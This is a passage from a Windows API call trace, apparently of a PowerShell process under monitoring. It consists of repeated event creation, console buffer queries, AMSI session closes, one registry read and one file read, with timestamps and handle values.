(lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x838 [0249.923] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x83c [0249.925] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x840 [0249.925] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x844 [0249.926] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x59e864 | out: phkResult=0x59e864*=0x848) returned 0x0 [0249.929] RegQueryValueExW (in: hKey=0x848, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x59e884, lpData=0x0, lpcbData=0x59e880*=0x0 | out: lpType=0x59e884*=0x0, lpData=0x0, lpcbData=0x59e880*=0x0) returned 0x2 [0249.930] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x84c [0249.930] SetEvent (hEvent=0x84c) returned 1 [0249.964] SetEvent (hEvent=0x81c) returned 1 [0249.964] SetEvent (hEvent=0x60c) returned 1 [0249.964] SetEvent (hEvent=0x814) returned 1 [0249.964] SetEvent (hEvent=0x818) returned 1 [0256.363] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.365] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.366] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.367] AmsiCloseSession () returned 0xba78b0 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x87c [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x878 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x750 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x884 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x880 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x890 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x894 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x898 [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x89c [0256.368] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8a0 [0256.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a4 [0256.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a8 [0256.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8ac [0256.369] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8b0 [0256.370] SetEvent (hEvent=0x84c) returned 1 [0256.371] SetEvent (hEvent=0x884) returned 1 [0256.371] SetEvent (hEvent=0x87c) returned 1 [0256.371] SetEvent (hEvent=0x878) returned 1 [0256.371] SetEvent (hEvent=0x750) returned 1 [0256.822] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.823] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.824] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0256.825] AmsiCloseSession () returned 0xba78b0 [0256.825] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8bc [0256.825] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8b8 [0256.825] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8c4 [0256.825] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8c0 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c8 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8cc [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8d0 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8d4 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8d8 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8dc [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e0 [0256.826] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e4 [0256.827] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e8 [0256.827] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8ec [0256.827] SetEvent (hEvent=0x84c) returned 1 [0256.832] SetEvent (hEvent=0x8c0) returned 1 [0256.832] SetEvent (hEvent=0x8bc) returned 1 [0256.832] SetEvent (hEvent=0x8b8) returned 1 [0256.832] SetEvent (hEvent=0x8c4) returned 1 [0257.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.138] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.139] AmsiCloseSession () returned 0xba78b0 [0257.139] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8f4 [0257.139] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x8f0 [0257.139] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8fc [0257.139] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8f8 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x900 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x904 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x908 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x90c [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x910 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x914 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x918 [0257.140] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x91c [0257.145] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x920 [0257.145] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x924 [0257.145] SetEvent (hEvent=0x84c) returned 1 [0257.146] SetEvent (hEvent=0x8f8) returned 1 [0257.146] SetEvent (hEvent=0x8f4) returned 1 [0257.146] SetEvent (hEvent=0x8f0) returned 1 [0257.146] SetEvent (hEvent=0x8fc) returned 1 [0257.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0257.330] AmsiCloseSession () returned 0xba78b0 [0257.330] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x92c [0257.330] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x928 [0257.330] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x934 [0257.330] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x930 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x938 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x93c [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x940 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x944 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x948 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x94c [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x950 [0257.331] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x954 [0257.332] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958 [0257.332] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x95c [0257.332] SetEvent (hEvent=0x84c) returned 1 [0257.335] SetEvent (hEvent=0x930) returned 1 [0257.335] SetEvent (hEvent=0x92c) returned 1 [0257.335] SetEvent (hEvent=0x928) returned 1 [0257.335] SetEvent (hEvent=0x934) returned 1 [0275.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0275.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0275.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0275.132] AmsiCloseSession () returned 0xba78b0 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x964 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x960 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x410 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x804 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7fc [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f8 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f4 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7f0 [0275.133] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7ec [0275.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x808 [0275.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x80c [0275.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x968 [0275.134] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x970 [0275.134] SetEvent (hEvent=0x84c) returned 1 [0275.135] SetEvent (hEvent=0x410) returned 1 [0275.135] SetEvent (hEvent=0x964) returned 1 [0275.135] SetEvent (hEvent=0x960) returned 1 [0275.136] SetEvent (hEvent=0x40c) returned 1 [0277.297] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0277.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0277.300] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0277.300] AmsiCloseSession () returned 0xba78b0 [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x97c [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x978 [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x974 [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x984 [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x980 [0277.301] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x988 [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x98c [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x990 [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x994 [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x998 [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x99c [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9a0 [0277.302] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9a4 [0277.303] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9a8 [0277.303] SetEvent (hEvent=0x84c) returned 1 [0277.304] SetEvent (hEvent=0x984) returned 1 [0277.304] SetEvent (hEvent=0x97c) returned 1 [0277.304] SetEvent (hEvent=0x978) returned 1 [0277.304] SetEvent (hEvent=0x974) returned 1 [0279.807] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0279.808] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0279.809] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0279.810] AmsiCloseSession () returned 0xba78b0 [0279.810] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9b0 [0279.810] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9ac [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b8 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b4 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9bc [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9c0 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c4 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9c8 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9cc [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9d0 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d4 [0279.811] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9d8 [0279.812] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9dc [0279.812] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9e0 [0279.812] SetEvent (hEvent=0x84c) returned 1 [0279.814] SetEvent (hEvent=0x9b4) returned 1 [0279.814] SetEvent (hEvent=0x9b0) returned 1 [0279.814] SetEvent (hEvent=0x9ac) returned 1 [0279.814] SetEvent (hEvent=0x9b8) returned 1 [0282.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0282.524] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0282.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0282.526] AmsiCloseSession () returned 0xba78b0 [0282.526] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e8 [0282.526] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9e4 [0282.526] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9f0 [0282.526] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9ec [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9f4 [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9f8 [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9fc [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa00 [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa04 [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa08 [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa0c [0282.527] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa10 [0282.528] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa14 [0282.528] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa18 [0282.528] SetEvent (hEvent=0x84c) returned 1 [0282.529] SetEvent (hEvent=0x9ec) returned 1 [0282.529] SetEvent (hEvent=0x9e8) returned 1 [0282.529] SetEvent (hEvent=0x9e4) returned 1 [0282.529] SetEvent (hEvent=0x9f0) returned 1 [0284.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0284.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0284.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0284.931] AmsiCloseSession () returned 0xba78b0 [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa20 [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa1c [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa28 [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa24 [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa2c [0284.931] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa30 [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa34 [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa38 [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa3c [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa40 [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa44 [0284.932] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa48 [0284.933] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa4c [0284.934] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa50 [0284.934] SetEvent (hEvent=0x84c) returned 1 [0284.935] SetEvent (hEvent=0xa24) returned 1 [0284.935] SetEvent (hEvent=0xa20) returned 1 [0284.935] SetEvent (hEvent=0xa1c) returned 1 [0284.935] SetEvent (hEvent=0xa28) returned 1 [0287.060] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0287.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0287.062] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0287.063] AmsiCloseSession () returned 0xba78b0 [0287.063] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa58 [0287.063] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa54 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa60 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa5c [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa68 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa6c [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa70 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa74 [0287.064] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa78 [0287.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa7c [0287.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80 [0287.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa84 [0287.065] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa88 [0287.065] SetEvent (hEvent=0x84c) returned 1 [0287.066] SetEvent (hEvent=0xa5c) returned 1 [0287.066] SetEvent (hEvent=0xa58) returned 1 [0287.066] SetEvent (hEvent=0xa54) returned 1 [0287.066] SetEvent (hEvent=0xa60) returned 1 [0289.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0289.715] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0289.718] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0289.719] AmsiCloseSession () returned 0xba78b0 [0289.719] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa0c [0289.719] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0xa08 [0289.719] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa8c [0289.719] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b0 [0289.719] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa10 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9ac [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b8 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b4 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9bc [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9c0 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x60c [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x814 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x818 [0289.720] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x81c [0289.721] SetEvent (hEvent=0x84c) returned 1 [0289.722] SetEvent (hEvent=0x9b0) returned 1 [0289.722] SetEvent (hEvent=0xa0c) returned 1 [0289.722] SetEvent (hEvent=0xa08) returned 1 [0289.722] SetEvent (hEvent=0xa8c) returned 1 [0292.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0292.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0292.134] ReadFile (in: hFile=0x1e8, lpBuffer=0x4b2cc84, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x59e8cc, lpOverlapped=0x0 | out: lpBuffer=0x4b2cc84*, lpNumberOfBytesRead=0x59e8cc*=0x400, lpOverlapped=0x0) returned 1 [0292.134] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x610, lpConsoleScreenBufferInfo=0x59e94c | out: lpConsoleScreenBufferInfo=0x59e94c) returned 1 [0292.135] AmsiCloseSession () returned 0xba78b0 [0292.135] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x824 [0292.135] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x820 [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x82c [0292.136] CreateEventW (lpEventAttributes=0x0, bManualReset=1, 